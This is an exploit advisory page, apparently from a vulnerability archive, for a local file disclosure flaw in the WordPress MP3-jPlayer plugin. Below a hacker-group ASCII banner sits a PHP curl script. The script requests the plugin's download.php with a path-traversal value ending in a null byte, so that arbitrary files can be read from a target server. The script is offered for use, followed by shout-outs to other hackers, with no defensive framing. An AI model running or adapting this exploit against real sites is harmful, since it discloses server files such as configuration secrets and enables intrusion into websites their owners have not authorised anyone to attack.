WordPress MP3-Jplayer 2.1 Local File Disclosure

2015.03.24
Credit: KedAns-Dz
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<?php ########################################### #-----------------------------------------# #[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]# #-----------------------------------------# # *----------------------------* # # K |....##...##..####...####....| . # # h |....#...#........#..#...#...| A # # a |....#..#.........#..#....#..| N # # l |....###........##...#.....#.| S # # E |....#.#..........#..#....#..| e # # D |....#..#.........#..#...#...| u # # . |....##..##...####...####....| r # # *----------------------------* # #-----------------------------------------# #[ Copyright (c) 2015 | Dz Offenders Cr3w]# #-----------------------------------------# ########################################### # >> D_x . Made In Algeria . x_Z << # ########################################### # # [>] Title : WordPress plugin (mp3-jplayer v2.3) Local File Disclosure # # [>] Author : KedAns-Dz # [+] E-mail : ked-h (@hotmail.com) # [+] FaCeb0ok : fb.me/K3d.Dz # [+] TwiTter : @kedans # # [#] Platform : PHP / WebApp # [+] Cat/Tag : File Disclosure # # [<] <3 <3 Greetings t0 Palestine <3 <3 # [!] Vendor : http://mp3-jplayer.com # ########################################### # # [!] Description : # # Wordpress plugin mp3-jplayer v2.3 is suffer from local file disclosure, # remote attacker can Download/Disclosure file's from the root-path. # # ExpLO!T : # ------- # $dz = curl_init(); curl_setopt($dz, CURLOPT_URL, "http://[Target]/wp-content/plugins/mp3-jplayer/download.php?mp3=[ LFI ]%00.mp3"); # or ../remote/downloader.php?mp3=[ LFI ]%00.ogg curl_setopt($dz, CURLOPT_HTTPGET, 1); curl_setopt($dz, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($dz, CURLOPT_TIMEOUT, 0); $buf = curl_exec ($dz); curl_close($dz); unset($dz); echo $buf; #### # <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !> # Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3 #--------------------------------------------------------------- # Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , # Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic, # & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , & # & KnocKout , Angel Injection , The Black Divels , kaMtiEz , & # & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, & # & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & # PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ; #### # REF : http://k3dsec.blogspot.com/2015/03/wordpress-plugin-mp3-jplayer-v23-local.html ?>

References:

http://k3dsec.blogspot.com/2015/03/wordpress-plugin-mp3-jplayer-v23-local.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top